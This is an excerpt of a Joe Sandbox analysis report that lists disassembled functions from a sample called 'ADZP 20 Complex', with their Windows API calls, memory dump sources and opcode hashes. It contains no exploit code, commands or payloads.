                    Function 0040A6C3 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040A72B
                    • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?,00403C0E), ref: 0040A741
                    • wcscpy.MSVCRT ref: 0040A74C
                    • memset.MSVCRT ref: 0040A77A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeapmemsetwcscpywcslen
                    • String ID: $0A
                    • API String ID: 1807340688-513306843
                    • Opcode ID: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                    • Instruction ID: e32262bd00c92b68ef8260e1fb7dc13a688965226c4dfc8bf1af71259570edab
                    • Opcode Fuzzy Hash: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
                    • Instruction Fuzzy Hash: 3C214872100B01AFC321AF159881B6BB7F9EF88314F14893FF58563691CB79E8258B1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A460 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                      • Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                    • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                    • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                    • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A51C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Free$Alloc
                    • String ID: $0A
                    • API String ID: 3901518246-513306843
                    • Opcode ID: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                    • Instruction ID: cd652e3bdf182b70a5213d1d771de0a97fad45979f4c99c471b58853275527fc
                    • Opcode Fuzzy Hash: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
                    • Instruction Fuzzy Hash: F4216AB1600716BFD3108F2ADC01B46BBE4FB4C700F41812EB508E76A1DB70E964CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040548C Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02209F70), ref: 004054A5
                    • EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                    • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                    • CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                      • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                    • LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3708593966-0
                    • Opcode ID: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                    • Instruction ID: 22802cd27a3f1ed093d1fd342325ad429a5e5b172653039cc62d2cb3277a330b
                    • Opcode Fuzzy Hash: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
                    • Instruction Fuzzy Hash: AD11C232148214BFC3115F69EC05AD7BBB9EF46752720843AF800972A0EB75A8818B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DFC6 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                    • LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                      • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                    • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040E048
                    • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040E057
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                    • String ID:
                    • API String ID: 3171405041-0
                    • Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                    • Instruction ID: 55e4d48cd168304893741703cb98186ecc41a8d0b28d64f5ed6d9708d3a92668
                    • Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
                    • Instruction Fuzzy Hash: 23116A71101611EFC720AF16DC08B97BBB9FF45301F15883EE50AA7AA1C779A855CFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040994F Relevance: 7.5, APIs: 6, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • CloseHandle.KERNEL32(02209F70,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040995D
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409968
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409973
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040997E
                    • EnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409986
                    • LeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040999A
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CloseHandle$CriticalSection$EnterLeave
                    • String ID:
                    • API String ID: 10009202-0
                    • Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                    • Instruction ID: e0bc3ded0607a690d6707024abf9d108a6c512657707c309f6689cc3689588ed
                    • Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                    • Instruction Fuzzy Hash: 35F0FE32004600ABD3226F25DC08BABB7B5BF91355F15883EE055615B0CB796896DF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E967
                    • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                    • wcscmp.MSVCRT ref: 004096C2
                    • memmove.MSVCRT ref: 004096DA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                    • String ID: \\?\
                    • API String ID: 2309408642-4282027825
                    • Opcode ID: 0fa9378e7acfbfa4384f3ad6efa90c035d6f5c5d5c6cb34ed41858775d4772d8
                    • Instruction ID: 45f2cbb32eb965b059acfe96771e330f3b1ba6a562bb2c4a442859e911d7a588
                    • Opcode Fuzzy Hash: 0fa9378e7acfbfa4384f3ad6efa90c035d6f5c5d5c6cb34ed41858775d4772d8
                    • Instruction Fuzzy Hash: 15F0E2B31002017AC2006777DC89CAB7BACEB853B4750093FF516E2491EA38D82486B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B8B6 Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                    • Instruction ID: 1965f6ec6392bd57460d2593cd94e0dced67690f07481f5a959be489f1b8959c
                    • Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                    • Instruction Fuzzy Hash: FD21D6727507083BE524AA29DC86F9F738CDB41708F50063EF241B62C1DA79E54546AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeapwcsncpy
                    • String ID:
                    • API String ID: 2304708654-0
                    • Opcode ID: 18f9f6b2c25530330925e792ae8237d4e1f414d71162ef7611e6bfa166886baa
                    • Instruction ID: c5f2f283d94cb2b95ca38a154dbf8d05cc6d7144c7ec2ede7a16228095844b4d
                    • Opcode Fuzzy Hash: 18f9f6b2c25530330925e792ae8237d4e1f414d71162ef7611e6bfa166886baa
                    • Instruction Fuzzy Hash: F751BD34508B059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406696
                    • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066D0
                    • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066FF
                    • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406705
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CharLower
                    • String ID:
                    • API String ID: 1615517891-0
                    • Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                    • Instruction ID: f3574eb3d9009b883351c62f390b1b458f0f5c76b551c27569f8cb84250b8306
                    • Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                    • Instruction Fuzzy Hash: 0E2157796043158BC710EF5D9C40077B3A0EF80765F86887BFC85A3380DA39EE169BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412840 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D738,00000000), ref: 00412874
                    • malloc.MSVCRT ref: 00412884
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 004128A1
                    • malloc.MSVCRT ref: 004128B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidemalloc
                    • String ID:
                    • API String ID: 2735977093-0
                    • Opcode ID: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                    • Instruction ID: e0c8a2120d9564889d2f3113141632f921e3b611a2b6a27c47ae7c2ad602c93a
                    • Opcode Fuzzy Hash: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                    • Instruction Fuzzy Hash: 9E01453B34130127E3206699AC12FB73B59CB81B95F19017AFB009E2C0D6F3A80082B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004128E0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412911
                    • malloc.MSVCRT ref: 00412921
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041293B
                    • malloc.MSVCRT ref: 00412950
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidemalloc
                    • String ID:
                    • API String ID: 2735977093-0
                    • Opcode ID: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                    • Instruction ID: 3026177615c0ccb99804f522c9f73c57bab6efbcd972e36018b7209c0027a648
                    • Opcode Fuzzy Hash: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                    • Instruction Fuzzy Hash: AB01F57734534127E3205699AD42FA77B59CB81BA5F19007AFB01AE2C0DAF7681086B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AFEC Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                    Download Yara Rule
                    APIs
                    • SHGetFolderLocation.SHELL32(00000000,02209F70,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?), ref: 0040AFFE
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040B00F
                    • wcslen.MSVCRT ref: 0040B01A
                    • CoTaskMemFree.OLE32(00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040B038
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FolderFreeFromListLocationPathTaskwcslen
                    • String ID:
                    • API String ID: 4012708801-0
                    • Opcode ID: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                    • Instruction ID: ea6acf64d2064cc2033e367344890d06019be10827a432285197bb32926cdf71
                    • Opcode Fuzzy Hash: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                    • Instruction Fuzzy Hash: BBF08136500615BAC7205F6ADC0DDAB7B7CEF15BA07404226F805E6260E7319910D7E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405430 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004053E4: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
                      • Part of subcall function 004053E4: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422
                    • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
                    • EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
                    • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C
                      • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                    • LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                    • String ID:
                    • API String ID: 85618057-0
                    • Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                    • Instruction ID: 2660d4446155f5fb089545407d2c8513ff3ad75f9eb032afb91e50ebd33cab77
                    • Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                    • Instruction Fuzzy Hash: 05F0E233404610FBC6205B619C49EE77779EF55767724883FF94172291CB386841CE6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004099C7 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                    • DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                    • CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CurrentHandleProcess$CloseDuplicate
                    • String ID:
                    • API String ID: 1410216518-0
                    • Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                    • Instruction ID: ce6dac3176af70590056e0be6dcfbc27d6d18e8bdc9d520293d6dd9450c8e6f1
                    • Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                    • Instruction Fuzzy Hash: 73E0ED75608209BFEB10DF91DC49F9ABB7DEB44741F104065F905D2660EB71AD11CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402FAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
